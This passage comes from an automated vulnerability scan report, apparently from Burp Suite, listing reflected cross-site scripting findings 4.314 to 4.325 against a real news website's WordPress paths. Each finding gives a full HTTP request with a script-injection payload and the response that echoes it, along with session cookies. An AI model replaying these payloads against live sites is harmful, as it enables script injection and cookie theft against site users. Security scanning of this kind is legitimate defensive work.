Date: Mon, 24 Jan 2011 22:13:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=ec89cdfb92a6c430a9d2c331418f8fd9
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:00 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/wp-email62b9e\"><script>alert(1)</script>064da61cc06/email-js.js?ver=2.50'; }); return true;" >
...[SNIP]...

4.314. http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-js.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/wp-email/email-js.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eee58"><script>alert(1)</script>1fe76ddfa4b was submitted in the REST URL parameter 4. This input was echoed as eee58\"><script>alert(1)</script>1fe76ddfa4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-email/email-js.jseee58"><script>alert(1)</script>1fe76ddfa4b?ver=2.50 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=ec89cdfb92a6c430a9d2c331418f8fd9
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:26 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/wp-email/email-js.jseee58\"><script>alert(1)</script>1fe76ddfa4b?ver=2.50'; }); return true;" >
...[SNIP]...

4.315. http://starscene.dailystar.com.lb/wp-content/themes/options/library/js/options.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/options/library/js/options.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a04e"><script>alert(1)</script>672ab228cd3 was submitted in the REST URL parameter 1. This input was echoed as 2a04e\"><script>alert(1)</script>672ab228cd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content2a04e"><script>alert(1)</script>672ab228cd3/themes/options/library/js/options.js?ver=1.3 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:08:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=5d237301c525dbb4f587fd7fb7ccf289
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:08:36 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:08:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content2a04e\"><script>alert(1)</script>672ab228cd3/themes/options/library/js/options.js?ver=1.3'; }); return true;" >
...[SNIP]...

4.316. http://starscene.dailystar.com.lb/wp-content/themes/options/library/js/options.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/options/library/js/options.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93d93"><script>alert(1)</script>10a8b64d52e was submitted in the REST URL parameter 2. This input was echoed as 93d93\"><script>alert(1)</script>10a8b64d52e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes93d93"><script>alert(1)</script>10a8b64d52e/options/library/js/options.js?ver=1.3 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:09:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=5d237301c525dbb4f587fd7fb7ccf289
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:09:17 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:09:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes93d93\"><script>alert(1)</script>10a8b64d52e/options/library/js/options.js?ver=1.3'; }); return true;" >
...[SNIP]...

4.317. http://starscene.dailystar.com.lb/wp-content/themes/options/library/js/options.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/options/library/js/options.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c154"><script>alert(1)</script>1d3042fa2f7 was submitted in the REST URL parameter 3. This input was echoed as 4c154\"><script>alert(1)</script>1d3042fa2f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/options4c154"><script>alert(1)</script>1d3042fa2f7/library/js/options.js?ver=1.3 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:10:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=5d237301c525dbb4f587fd7fb7ccf289
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:10:13 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:10:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/options4c154\"><script>alert(1)</script>1d3042fa2f7/library/js/options.js?ver=1.3'; }); return true;" >
...[SNIP]...

4.318. http://starscene.dailystar.com.lb/wp-content/themes/options/library/js/options.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/options/library/js/options.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77e75"><script>alert(1)</script>c8147f385f2 was submitted in the REST URL parameter 4. This input was echoed as 77e75\"><script>alert(1)</script>c8147f385f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/options/library77e75"><script>alert(1)</script>c8147f385f2/js/options.js?ver=1.3 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:11:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=5d237301c525dbb4f587fd7fb7ccf289
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:28 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/options/library77e75\"><script>alert(1)</script>c8147f385f2/js/options.js?ver=1.3'; }); return true;" >
...[SNIP]...

4.319. http://starscene.dailystar.com.lb/wp-content/themes/options/library/js/options.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/options/library/js/options.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9e93"><script>alert(1)</script>61762929006 was submitted in the REST URL parameter 5. This input was echoed as b9e93\"><script>alert(1)</script>61762929006 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/options/library/jsb9e93"><script>alert(1)</script>61762929006/options.js?ver=1.3 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=5d237301c525dbb4f587fd7fb7ccf289
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:39 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/options/library/jsb9e93\"><script>alert(1)</script>61762929006/options.js?ver=1.3'; }); return true;" >
...[SNIP]...

4.320. http://starscene.dailystar.com.lb/wp-content/themes/options/library/js/options.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/options/library/js/options.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41a74"><script>alert(1)</script>a7ec7cfe43f was submitted in the REST URL parameter 6. This input was echoed as 41a74\"><script>alert(1)</script>a7ec7cfe43f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/options/library/js/options.js41a74"><script>alert(1)</script>a7ec7cfe43f?ver=1.3 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:14:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=5d237301c525dbb4f587fd7fb7ccf289
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:23 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:23 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/options/library/js/options.js41a74\"><script>alert(1)</script>a7ec7cfe43f?ver=1.3'; }); return true;" >
...[SNIP]...

4.321. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/facebox/facebox.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bb02"><script>alert(1)</script>971f88f74ac was submitted in the REST URL parameter 1. This input was echoed as 8bb02\"><script>alert(1)</script>971f88f74ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content8bb02"><script>alert(1)</script>971f88f74ac/themes/shadow/facebox/facebox.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:06:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:06:43 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:06:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content8bb02\"><script>alert(1)</script>971f88f74ac/themes/shadow/facebox/facebox.css'; }); return true;" >
...[SNIP]...

4.322. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/facebox/facebox.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64b69"><script>alert(1)</script>0aef2fe1fea was submitted in the REST URL parameter 2. This input was echoed as 64b69\"><script>alert(1)</script>0aef2fe1fea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes64b69"><script>alert(1)</script>0aef2fe1fea/shadow/facebox/facebox.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:07:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:07:20 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:07:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes64b69\"><script>alert(1)</script>0aef2fe1fea/shadow/facebox/facebox.css'; }); return true;" >
...[SNIP]...

4.323. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/facebox/facebox.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb56c"><script>alert(1)</script>cf98169985f was submitted in the REST URL parameter 3. This input was echoed as cb56c\"><script>alert(1)</script>cf98169985f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadowcb56c"><script>alert(1)</script>cf98169985f/facebox/facebox.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:07:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:07:58 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:07:58 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadowcb56c\"><script>alert(1)</script>cf98169985f/facebox/facebox.css'; }); return true;" >
...[SNIP]...

4.324. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/facebox/facebox.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 465cc"><script>alert(1)</script>8b6764eb766 was submitted in the REST URL parameter 4. This input was echoed as 465cc\"><script>alert(1)</script>8b6764eb766 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow/facebox465cc"><script>alert(1)</script>8b6764eb766/facebox.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:08:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:08:36 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:08:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow/facebox465cc\"><script>alert(1)</script>8b6764eb766/facebox.css'; }); return true;" >
...[SNIP]...

4.325. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/facebox/facebox.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87596"><script>alert(1)</script>4c535a121ba was submitted in the REST URL parameter 5. This input was echoed as 87596\"><script>alert(1)</script>4c535a121ba in the application's response.

